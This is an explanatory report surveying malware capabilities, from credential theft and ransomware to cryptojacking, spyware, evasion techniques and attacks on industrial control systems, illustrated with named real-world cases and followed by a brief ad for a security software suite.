Malware, short for malicious software, represents one of the most significant threats to modern computing environments, capable of performing an extraordinarily diverse array of harmful activities against both individual users and organizations. The scope of what contemporary malware can accomplish extends far beyond the simple file deletion or system slowdowns of earlier decades, encompassing sophisticated data theft operations, complete system takeover capabilities, financial extortion schemes, unauthorized resource consumption, and damage to critical infrastructure. Understanding the full spectrum of malware capabilities is essential for developing effective cybersecurity strategies, as threat actors continuously evolve their tools and techniques to exploit emerging vulnerabilities and circumvent security measures. This report provides a detailed examination of the various damaging actions that malware can perform, the mechanisms through which it achieves these goals, and the profound consequences for both individual users and organizational operations. By examining actual examples and documented cases, this analysis demonstrates that modern malware operates as a sophisticated tool for financial gain, espionage, sabotage, and the disruption of critical services across virtually all sectors of society.
Data Exfiltration and Credential Theft: The Foundation of Malware Damage
Data exfiltration represents one of the most common and damaging objectives of malware, with threat actors employing a wide variety of sophisticated techniques to steal sensitive information from compromised systems. Once a system is infected with malware, attackers can steal sensitive information stored on the system, such as emails, passwords, intellectual property, financial information and login credentials. This form of information theft can result in substantial monetary or reputational damage to individuals and organizations, as the stolen data can be leveraged for identity theft, financial fraud, competitive espionage, or sold on dark web marketplaces to other criminal actors. The mechanics of data exfiltration have become increasingly sophisticated, with malware employing specialized techniques to identify and extract the most valuable information available on a compromised system.
Credential theft represents a particularly critical capability of modern malware, as stolen credentials provide attackers with legitimate-appearing access to systems and services. Keyloggers, a specialized form of spyware that monitors user activity, represent one of the most effective methods of capturing sensitive authentication information. Keyloggers discreetly log every keystroke made on a computer, effectively capturing sensitive information such as passwords, financial details, and personal messages. Some keyloggers operate through legitimate business purposes; however, when installed for malicious purposes, keyloggers can be used to steal password data, banking information and other sensitive information. The Olympic Vision keylogger exemplifies this threat, having been used to target US, Middle Eastern and Asian businessmen for business email compromise attacks through spear-phishing and social engineering techniques to infect target systems in order to steal sensitive data and spy on business transactions. Despite its relative simplicity compared to more advanced malware, Olympic Vision’s availability on the black market for just $25 makes it highly accessible to malicious actors with limited resources or technical expertise.
Information stealers represent another sophisticated category of credential-stealing malware, with recent examples demonstrating alarming capabilities for harvesting sensitive authentication data across multiple platforms. In a notable 2025 incident, researchers discovered a set of malicious npm packages designed to deliver an information stealer targeting Windows, Linux, and macOS systems through four layers of obfuscation that display a fake CAPTCHA to appear legitimate, fingerprint victims by IP address, and download a substantial PyInstaller-packaged information stealer that harvests credentials from system keyrings, browsers, and authentication services. By targeting the keyring directly, the malware bypasses application-level security and harvests stored credentials in their decrypted form, providing immediate access to corporate email, file storage, internal networks, and production databases. This approach represents a particularly dangerous evolution in malware design, as system keyrings store credentials for critical services including email clients, cloud storage sync tools, VPN connections, password managers, SSH passphrases, and database connection strings that provide attackers with comprehensive access to victim organizations.
The consequences of credential theft extend far beyond immediate financial losses, as compromised credentials serve as entry points for additional attacks and lateral movement throughout networks. In one documented case, the threat actor known as COSMIC WOLF compromised a large cloud service provider environment through a stolen credential that allowed the operator to interact with the cloud service using the command line, ultimately altering security group settings to allow direct SSH access from malicious infrastructure. This progression from initial credential theft to full infrastructure compromise demonstrates how credential-stealing malware serves as a critical first step in sophisticated attack chains that can ultimately result in complete organizational compromise. The attacker can use their access to expand their foothold in the targeted organization, accessing additional systems and data with each successful lateral movement.
System Control and Remote Manipulation: Command and Control Infrastructure
Among the most significant capabilities of modern malware is the establishment of remote command and control infrastructure that allows attackers to maintain persistent control over compromised systems and execute arbitrary commands at will. Command and Control, also known as C2 or C&C, represents a method that cybercriminals use to communicate with compromised devices within a target company’s network, enabling attackers to send commands to and receive data from computers compromised by malware through a C2 server also known as a C&C server. This bidirectional communication channel represents a critical component of sophisticated malware operations, as it transforms individual compromised machines into nodes within a larger attack infrastructure capable of coordinating complex, multi-stage operations across multiple victim organizations. The attacker can use the server to perform various malicious actions on the target network, such as data discovery, malware spreading, or denial of service attacks, with the server also serving as the headquarters for a botnet, which is a network of infected devices.
The technical sophistication of command and control infrastructure has evolved dramatically as security researchers and defensive measures have improved. Some attackers use existing cloud-based services to hide C&C servers and avoid detection, with one or more communication channels existing between a victim’s PC or an organization and the platform that a hacker controls. Recent innovations have demonstrated particularly novel approaches to establishing command and control channels; notably, a sophisticated backdoor called SesameOp discovered in 2025 uses the OpenAI Assistants Application Programming Interface as a mechanism for command-and-control communications, abusing OpenAI as a C2 channel as a way to stealthily communicate and orchestrate malicious activities within the compromised environment. Rather than relying on more traditional methods, the threat actor behind this backdoor uses a component that leverages the OpenAI Assistants API as a storage or relay mechanism to fetch commands, which the malware then runs, demonstrating how attackers continuously adapt to exploit emerging technologies and services.
The mechanisms through which malware communicates with command and control infrastructure vary substantially depending on the sophistication of the threat actor and the resources available to them. Centralized command and control models function much like traditional client-server relationships, where malware clients phone home to a C2 server and check for instructions, though in practice an attacker’s server-side infrastructure is often far more complex than a single server and may include redirectors, load balancers, and defense measures to detect security researchers and law enforcement. Public cloud services and Content Delivery Networks are frequently used to host or mask C2 activity, with attackers commonly compromising legitimate websites and using them to host command and control servers without the owner’s knowledge. As defensive measures have improved at detecting and blocking traditional C2 domains and servers, modern malware is often coded with a list of many different C2 servers to try and reach, with the most sophisticated attacks introducing additional layers of obfuscation to maintain functionality even as individual C2 endpoints are disrupted.
Lateral movement within compromised networks represents a critical capability enabled by command and control infrastructure, allowing attackers to expand from an initial point of entry to access high-value targets throughout an organization. Once an attacker has a foothold on a device inside the network, they perform reconnaissance to find out as much as they can about the network, including what the compromised device has access to and, if they have compromised a user’s account, what privileges the user has. Through command and control channels, attackers can orchestrate privilege escalation, moving from limited user accounts to administrator or system-level access that provides comprehensive control over targeted systems. This process may be repeated several times until the attacker gains access to high-value targets like file servers or domain controllers that contain the most sensitive organizational information. The threat actor known as BRICKSTORM exemplifies this capability through sophisticated techniques to maintain persistence and minimize the visibility traditional security tools have into their activities, with investigations revealing that this actor gained access to vCenter servers and ESXi hosts by first deploying the BRICKSTORM backdoor to network appliances and then moving laterally to VMware systems using valid credentials captured by the malware.
Ransomware, Extortion, and Multi-Layered Financial Attacks
Ransomware represents one of the most destructive categories of malware, employing encryption to disable a target’s access to its data until a ransom is paid, though the victim organization is rendered partially or totally unable to operate until it pays, with no guarantee that payment will result in the necessary decryption key or that the decryption key provided will function properly. The evolution from simple ransomware that encrypts files to sophisticated multi-extortion schemes demonstrates the escalating threat that malware poses to organizational operations and financial stability. In a notable real-world example, the city of Baltimore was hit by ransomware named RobbinHood, which halted all city activities, including tax collection, property transfers, and government email for weeks, with the attack costing the city more than $18 million to date, and costs continuing to accrue. The same type of malware was used against the city of Atlanta in 2018, resulting in costs of $17 million, illustrating how ransomware attacks can devastate municipal operations and drain public resources that would otherwise support essential services.
The mechanics of ransomware attacks have evolved significantly from simple encryption-based attacks to sophisticated multi-extortion operations that combine multiple layers of threats to maximize pressure on victims to pay ransom demands. Multi-extortion ransomware, sometimes called multifaceted extortion, uses multiple layers of attack to persuade victims to pay a ransom to the attacker, with additional attack methods beyond file encryption, such as file exfiltration, distributed denial of service attacks or extending ransoms to third-party associates. Single extortion ransomware, the first phase of multi-extortion attacks, involves encryption where attackers either encrypt whole systems or select files deemed highly important. However, many organizations have overcome the threat of file encryption through simple up-to-date backup systems, prompting malware operators to add another phase of extortion involving data exfiltration, a tactic made popular through malware such as Maze and DoppelPaymer, where attackers steal sensitive data and threaten to leak it to the public through dark web leak sites or sell it on the black market.
The escalation from double to triple extortion represents a significant innovation in ransomware tactics, expanding the playing field further for attackers by adding another layer of threats. Triple extortion ransomware attacks involve another layer of attack on top of file encryption and data theft, which could take various forms depending on the type of ransomware. One popular attack vector is service disruption, such as a distributed denial of service attack, where in addition to the loss of data and data exposure, the victim experiences a threat to critical operations. Another attack layer growing in popularity among ransomware groups involves third-party associate attacks, where the attacker extends threats and ransom demands to the original victim’s clients, suppliers or other associates, effectively multiplying the pressure points for forcing payment. Quadruple extortion ransomware represents the further evolution of these tactics, adding an additional layer through contacting third-party associates with ransom demands or other underhanded tactics, as exemplified when hardware supplier Quanta failed to pay the REvil ransomware group and the attackers turned their sights to Apple, one of Quanta’s clients.
Banking malware represents a specialized category of financially-motivated malware that targets the financial services sector and individual users’ banking credentials. Zeus, a sophisticated banking trojan that has been around since 2007, was originally designed to steal financial data and banking credentials but has evolved into modular, multi-stage malware that provides its operators with a full suite of tools to carry out numerous illegal cyber activities. The malware has evolved to include new delivery mechanisms, command and control techniques, and anti-analysis features, demonstrating how banking trojans continuously adapt to evade detection while maintaining their core financial theft capabilities. TrickBot malware represents another example of this category, first identified in 2016 as a Trojan developed and operated by sophisticated cybercrime actors that originated as a banking Trojan to steal financial data but evolved into modular, multi-stage malware providing operators with comprehensive tools for conducting illegal cyber activities. These banking trojans can be distributed mostly through drive-by downloads on compromised websites and via malvertising, where malicious code is inserted in adverts that are then placed on legitimate websites, or through malicious JavaScript inserted into a web page that produces pop-ups pushing users to download plugins.
Resource Exploitation and Unauthorized Computing Power Theft
Malware increasingly targets the computing resources of compromised systems, using stolen processing power for unauthorized cryptocurrency mining, botnet participation, and spam distribution that benefits attackers while degrading system performance for legitimate users. Cryptojacking, a malicious scheme to use people’s devices without their consent or knowledge to secretly mine cryptocurrency on the victim’s dime, represents a growing threat across desktop, mobile, and enterprise computing environments. Instead of building dedicated cryptomining computers with massive overhead costs, hackers use cryptojacking to steal computing resources from their victims’ devices, and when all these resources are added together, hackers are able to compete against sophisticated cryptomining operations without the costly overhead. The motivation behind cryptojacking is simple: money, as mining cryptocurrencies can be very lucrative, but turning a profit is now next to impossible without the means to cover large costs, making cryptojacking an effective, inexpensive way for resource-limited threat actors to mine valuable coins.
Cryptojackers employ multiple technical approaches to enslaving victim computing resources, with each method presenting distinct detection and removal challenges. One method works like classic malware, where users click on malicious links in emails that load cryptomining code directly onto their computers, and once infected, the cryptojacker starts working around the clock to mine cryptocurrency while staying hidden in the background, representing a persistent threat that has infected the computer itself. An alternative cryptojacking approach sometimes called drive-by cryptomining involves embedding a piece of JavaScript code into a web page, performing cryptocurrency mining on user machines that visit the page, with early instances of drive-by cryptomining involving web publishers caught up in the bitcoin craze seeking to supplement revenue and monetize traffic by openly asking visitors’ permission to mine for cryptocurrencies while on their site. While some early iterations posed as fair exchanges between publishers and visitors, the more recent incarnation typically operates without user knowledge or consent, silently consuming computational resources for unauthorized financial gain.
The consequences of cryptojacking extend beyond individual user frustration with slower computers, creating substantial costs for larger organizations affected by widespread compromises. Unlike most other types of malware, cryptojacking scripts may not damage computers or victims’ data, but stealing CPU resources has real consequences with slower computer performance representing more than an annoyance for larger organizations that might have suffered many cryptojacked systems. Electricity costs, IT labor costs, and missed opportunities represent just some of the consequences of what happens when an organization is affected by drive-by cryptojacking, with one documented incident involving cybercriminals cryptojacking the operational technology network of a European water utility’s control system, degrading the operators’ ability to manage the utility plant. Another instance involved a group of Russian scientists allegedly using the supercomputer at their research and nuclear warhead facility to mine Bitcoin, demonstrating how high-value targets face sophisticated cryptojacking threats.
Botnets represent another mechanism through which malware harnesses victim computing resources for purposes benefiting attackers while degrading legitimate system performance. A bot is a software application that performs automated tasks on command, used for legitimate purposes such as indexing search engines, but when used for malicious purposes, takes the form of self-propagating malware that can connect back to a central server. Usually, bots are used in large numbers to create a botnet, which is a network of bots used to launch broad remotely-controlled floods of attacks, such as DDoS attacks, with botnets becoming quite expansive—for example, the Mirai IoT botnet ranged from 800,000 to 2.5 million computers. Echobot, a variant of the well-known Mirai, attacks a wide range of IoT devices by exploiting over 50 different vulnerabilities, but it also includes exploits for Oracle WebLogic Server and VMWare’s SD-Wan networking software, allowing malicious actors to use it to launch DDoS attacks, interrupt supply chains, steal sensitive supply chain information and conduct corporate sabotage.
Spam propagation through compromised systems represents yet another mechanism through which malware exploits victim resources for financial gain. Spam propagation is composed of compromised systems sending unsolicited commercial and/or bulk email, with spambots using infected machines to distribute massive volumes of unsolicited messages to unwilling recipients. The exploitation of system resources for spam distribution creates secondary harms beyond the direct computational cost to the victim, as their compromised system becomes associated with spam distribution, potentially damaging the victim’s reputation and triggering blacklisting of their IP address or email domain by anti-spam systems. Many organizations face numerous competing priorities, such as physical facilities operations and maintenance, which further constrains the time and resources that operators can dedicate to cybersecurity practices, creating conditions where botnets can operate undetected for extended periods while generating substantial revenue for attackers.
Surveillance, Privacy Violation, and Personal Data Harvesting
Malware enables unprecedented levels of surveillance and privacy violation, with sophisticated spyware tools capable of transforming victim devices into comprehensive surveillance instruments that capture virtually all aspects of user activity. Spyware operates clandestinely, gathering data from users without their approval, frequently resulting in privacy violations and identity theft, with this type of malware tracking and recording various personal and sensitive information, from browsing habits to login credentials, without the knowledge or consent of the user. The surreptitious nature of spyware makes it particularly insidious, as individuals may be unaware of the breach for an extended period, with collected data exploitable for malicious purposes, including fraudulent activities and targeted phishing attacks, underscoring the importance of securing personal information and utilizing anti-spyware tools for protection. Data espionage, a type of malware known as spyware, performs by spying on users, with hackers typically using keyloggers to record keystrokes, access web cameras and microphones and capture screenshots.
The capabilities of modern surveillance malware extend far beyond simple keystroke logging or screenshot capture, encompassing sophisticated techniques to access webcams, microphones, and system resources that enable comprehensive monitoring of victim activities. Surveillance tools such as the “Pegasus” software can turn most smartphones into “24-hour surveillance devices”, allowing the intruder access not only to everything on mobile devices but also weaponizing them to spy on victims’ lives. While purportedly deployed for combating terrorism and crime, such spyware tools have often been used for illegitimate reasons, including to clamp down on critical or dissenting views and on those who express them, including journalists, opposition political figures and human rights defenders. Spyware can keep track of almost everything users do on their computers, including every keystroke typed, website visited, online chat or instant message sent or received, and documents opened, with some spyware able to allow the person who installed it to turn on the webcam or microphone, take screenshots, make the computer talk or make other noises, or shut down or restart the computer.
Adware represents a specialized category of malware focused on generating revenue through advertising while simultaneously compromising user experience and system security. Adware inundates users with unsolicited advertisements, impairing system performance and potentially serving as a conduit for further malware infections. This type of software not only disrupts the user experience by displaying persistent ads, but it can also slow down system operations and compromise security by exploiting vulnerabilities to install additional malicious programs. The presence of adware represents not only a nuisance but also a significant risk, highlighting the necessity for effective ad-blocking and anti-malware solutions to safeguard computers and personal information from this intrusive and potentially harmful software. Advertising click fraud provides malicious actors with a cut of the commission generated by fraudulent clicks on advertisements, as exemplified by the Zacinlo rootkit that opens invisible browsers and interacts with content like a human would through scrolling, highlighting and clicking to fool behavioral analysis software, with Zacinlo’s payload occurring when the malware clicks on ads in the invisible browsers.
Identity theft represents a critical consequence of malware-enabled data harvesting, with attackers leveraging stolen personal information to commit fraud or gain access to additional resources. Malware can be used to steal personal data which can be used to impersonate victims, commit fraud or gain access to additional resources, with the IBM X-Force Threat Intelligence Index 2024 reporting a 71% rise in cyberattacks using stolen identities in 2023 compared to the previous year. The consequences of identity theft extend far beyond immediate financial losses, potentially resulting in damaged credit ratings, compromised medical records, false criminal accusations, and years of effort to restore a victim’s reputation and financial standing. Identity theft happens when someone uses personal or financial information without permission, including names and addresses, credit card or Social Security numbers, bank account numbers, and medical insurance account numbers, with identity theft victims potentially remaining unaware of the crimes until substantial damage has already occurred to their financial assets, credit, and reputation.
System Damage and Operational Disruption: Making Systems Unusable
Malware can damage systems through various mechanisms that corrupt files, crash systems, render devices unusable, or prevent access to critical functionality necessary for normal operations. Certain types of malware, such as computer worms, can damage devices by corrupting the system files, deleting data or changing system settings, with this damage potentially leading to an unstable or unusable system. System corruption represents one of the most direct forms of damage malware can inflict, with viruses targeting Windows system files in several ways, including malware targeting files directly by deleting them, causing system instability, hijacking core DLL files to help propagate the infection while rendering the files unusable, targeting the files and corrupting them, rendering them unusable, and corrupting Windows Registry entries, preventing Windows from locating the system files it needs.
Logic bombs represent a specialized category of malware designed to cause harm and typically get inserted into a system once specific conditions are met, staying dormant and triggered when a certain event or condition is met, such as when a user takes a specific action on a certain date or time. The damage caused by logic bombs varies from changing bytes of data to making hard drives unreadable, with the most sophisticated examples incorporating mechanisms that directly damage hardware components. Cybersecurity specialists recently discovered logic bombs that attack and destroy the hardware components in a workstation or server including the cooling fans, hard drives, and power supplies, with the logic bomb overdriving these devices until they overheat or fail. The Stuxnet worm famously deployed a highly sophisticated logic bomb attack that physically damaged Iran’s nuclear centrifuges, demonstrating how malware can transcend purely digital consequences to produce physical destruction of critical infrastructure and equipment.
Service disruption through malware-enabled denial of service attacks represents another critical category of system damage, enabling attackers to render services unavailable to legitimate users. Malware can disrupt services in several ways, for example, by locking up computers and making them unusable or holding them hostage for financial gain by performing a ransomware attack, with malware also capable of targeting critical infrastructure, such as power grids, healthcare facilities or transportation systems to cause service disruptions. The consequences of such attacks on critical infrastructure extend far beyond individual organizational disruption to impact public safety and the functioning of essential services upon which modern society depends. DDoS attacks led by botnets represent a primary mechanism through which malware enables service disruption, with distributed denial-of-service attacks representing cyber-attacks wherein the threat actor seeks to make websites, web applications, networks, and infrastructure unavailable to legitimate users by saturating the services and causing downtimes and crashes.
Evasion, Anti-Forensics, and Persistence Mechanisms: Avoiding Detection and Removal
Modern malware employs increasingly sophisticated techniques to evade detection by security tools, remain persistent through system reboots and configuration changes, and eliminate forensic evidence of compromise. Fileless malware represents a particularly challenging category because it doesn’t install anything initially, instead making changes to files that are native to the operating system, such as PowerShell or WMI, with the operating system recognizing the edited files as legitimate, causing fileless attacks to not be caught by antivirus software, and because these attacks are stealthy, they are up to ten times more successful than traditional malware attacks. Astaroth exemplifies fileless malware campaigns, spamming users with links to .LNK shortcut files that when downloaded launch a WMIC tool along with a number of other legitimate Windows tools that download additional code executed only in memory, leaving no evidence that could be detected by vulnerability scanners before downloading and running a Trojan that steals credentials and uploads them to a remote server.
Polymorphic and metamorphic malware represent sophisticated evasion techniques that allow malware to change its appearance while maintaining its core functionality. Polymorphic malware refers to a type of malicious software that can change its code or appearance each time it infects a new system, making it difficult for traditional signature-based antivirus programs to detect and block it effectively. This evasion technique involves altering the malware’s structure or encryption method, creating numerous unique variants that evade static signature-based detection, which relies on identifying specific patterns within the malware’s code. Metamorphic malware takes this concept a step further by not only changing its appearance, but also modifying its underlying code while maintaining its functionality, with this dynamic transformation complicating detection attempts, as there is no fixed signature to match against, forcing security systems to rely on more advanced behavioral analysis and heuristics to identify and combat such threats.
Obfuscation and anti-analysis techniques represent fundamental evasion mechanisms employed by sophisticated malware to resist both automated and manual analysis. Code obfuscation in malware refers to the intentional manipulation of the code’s structure, logic, and presentation to make it intricate and convoluted, with this technique aiming to hinder signature-based detection employed by antivirus software by transforming the code into a complex and non-standard form that obscures recognizable patterns. Sandbox detection in malware involves the use of behavior-based evasion techniques to identify if the malware is running within a controlled environment, such as a virtual machine or sandbox, commonly used for analysis and detection purposes, with malware equipped with sandbox detection mechanisms capable of detecting the presence of certain attributes or behaviors associated with such environments, like specific file paths, registry entries, or network configurations. Upon detection of an analysis environment, the malware may alter its behavior, delay malicious actions, or remain dormant to evade analysis, with this dynamic response aiming to mislead security analysts and automated systems, delaying the discovery of its true malicious intent until it’s executed in a legitimate user environment.
Anti-forensics techniques represent critical capabilities that malware employs to eliminate evidence of compromise and hinder incident response investigations. Time manipulation, particularly timestomping, represents a common evasion tactic where the adversary changes the date and time of a malicious file created to disguise their actions, occurring in the master file table of a system, which represents the database of every single system file, with disruption to a file’s metadata making it harder for investigators to piece together the timeline of the incident. Disk or data wiping represents another impactful evasion technique where hackers wipe the entire drive of a system by deleting or overwriting in an effort to erase their trace, with adversaries carrying out this technique multiple times in hopes of ensuring the data that was once stored is now irrecoverable, though this process requires high skill and time, putting a pause in cyber investigations.
Persistence mechanisms enable malware to maintain access across system reboots, credential changes, and user logout events that would otherwise terminate the malware’s execution. Malware persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access, with techniques used for persistence including any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code. Registry run keys represent one of the most common persistence mechanisms, with adversaries achieving persistence by adding a program to a startup folder or referencing it with a Registry run key, enabling malware to automatically execute each time a user logs on or the system starts. Many sophisticated malware samples modify init.d, rc.local, or systemd files to ensure malware starts on appliance reboot, with actors using the sed command line utility to modify legitimate startup scripts to launch malicious code, ensuring persistence even if administrators attempt to remove the malware through standard mechanisms.
Supply Chain Attacks and Pre-Installation Threats
Supply chain attacks represent a critical malware delivery mechanism that compromises software and hardware before it reaches end users, allowing attackers to infect massive numbers of devices simultaneously. Software supply chain attacks target the less-secure elements in a software supply network, exploiting the trust between suppliers and customers, aiming to compromise software or hardware before it reaches the end user, with attackers infiltrating at any stage of the supply chain to gain unauthorized access to sensitive systems or data. By infiltrating at any stage of the supply chain, attackers gain unauthorized access to sensitive systems or data, with the complexity and interconnectivity of software supply chains making them attractive targets, as organizations often rely on third-party suppliers for various components and services, increasing the potential for exploitation.
Mobile malware distribution through compromised supply chains demonstrates the real-world impact of these attacks at scale. Triada, a rooting Trojan, was injected into the supply chain when millions of Android devices shipped with the malware pre-installed, gaining access to sensitive areas in the operating system and installing spam apps that display ads, sometimes replacing legitimate ads, with revenue from user clicks on unauthorized ads going to Triada’s developers. The BadBox 2.0 botnet represents a more recent and massive supply chain attack, with more than 10 million smart TVs, digital projectors, in-car infotainment systems, and even digital picture frames compromised through malware distributed in three ways: pre-installed on devices before purchase, retrieved from a command-and-control server contacted by the device on first boot, or downloaded from third-party app marketplaces. Once infected, devices were enrolled into a global botnet used for click-fraud campaigns, account hijacking, residential proxy services, and distributed denial-of-service attacks, with the operation relying on BadBox’s ability to evade threat detection by blending in with legitimate network traffic and leveraging the vast reach of consumer IoT to scale its activity worldwide.
Critical Infrastructure Compromise and Real-World Consequences
The targeting of critical infrastructure through malware represents perhaps the most consequential category of malware capabilities, with attacks potentially disrupting essential services upon which modern society depends. Iran-affiliated and pro-Russia cyber actors gained access to and in some cases have manipulated critical US industrial control systems in the food and agriculture, healthcare, and water and wastewater sectors in late 2023 and 2024, highlighting a potential public safety threat and an avenue for malicious cyber actors to cause physical damage and deny critical services. Outdated software, poor password security, the use of default credentials, and limited resources for system updates render ICS devices vulnerable to compromise, as they are commonly connected to corporate IT networks and increasingly to the Internet, with many operators facing numerous competing priorities that further constrain the time and resources they can dedicate to cybersecurity practices.
The IRGC-affiliated Cyber Av3ngers compromised Unitronics Series ICS programmable logic controllers in multiple US entities, mostly water and wastewater systems, and defaced the PLCs’ touch screens with an anti-Israel message, with a few of the water-sector victims briefly shutting down their systems and switching to manual operations in response to the defacement. Pro-Russia hacktivists remotely manipulated control systems within five water and wastewater systems and two dairies, typically accessing the ICS components via control interfaces with public-facing IP addresses, with documented incidents showing the group posting videos demonstrating attackers remotely manipulating settings on human-machine interfaces within US wastewater systems. This level of direct manipulation demonstrates the severe consequences of industrial control system compromise, as attackers can physically affect the operation of critical infrastructure with direct implications for public health and safety.
The Extent of Malware’s Capabilities
The analysis presented throughout this report demonstrates that modern malware represents a comprehensive and escalating threat to cybersecurity across virtually every sector and scale of operation, from individual users to critical infrastructure systems upon which millions of people depend. Malware’s capabilities have evolved from simple file deletion or system slowdowns to sophisticated operations encompassing data theft, system control, financial extortion, resource exploitation, surveillance, system damage, and critical infrastructure disruption. The diversity of malware objectives reflects the diversity of threat actors employing it, ranging from financially motivated cybercriminals seeking quick profits through ransomware and credential theft, to nation-state actors conducting espionage and infrastructure sabotage, to hacktivists pursuing political or social objectives through system disruption.
The technical sophistication of contemporary malware continues to increase as threat actors invest substantial resources in developing evasion techniques, persistence mechanisms, and novel delivery mechanisms that circumvent traditional security defenses. The convergence of multiple attack techniques—combining credential theft with lateral movement, data exfiltration with encryption, and service disruption with third-party extortion—demonstrates how modern malware enables attack campaigns of unprecedented complexity and impact. Organizations and individuals facing these threats must adopt comprehensive security postures that extend beyond simple antivirus software to encompass vulnerability management, network segmentation, threat detection and response capabilities, and organizational security awareness programs. The stakes of malware threats continue to rise as critical infrastructure becomes increasingly connected and dependent on digital systems, with successful malware attacks potentially affecting not just individual organizations but the functioning of essential services upon which entire communities and nations depend. Understanding what malware can do remains essential for developing effective defensive strategies and maintaining organizational and national cybersecurity in the face of continuously evolving threats.
Protect Your Digital Life with Activate Security
Get 14 powerful security tools in one comprehensive suite. VPN, antivirus, password manager, dark web monitoring, and more.
Get Protected Now
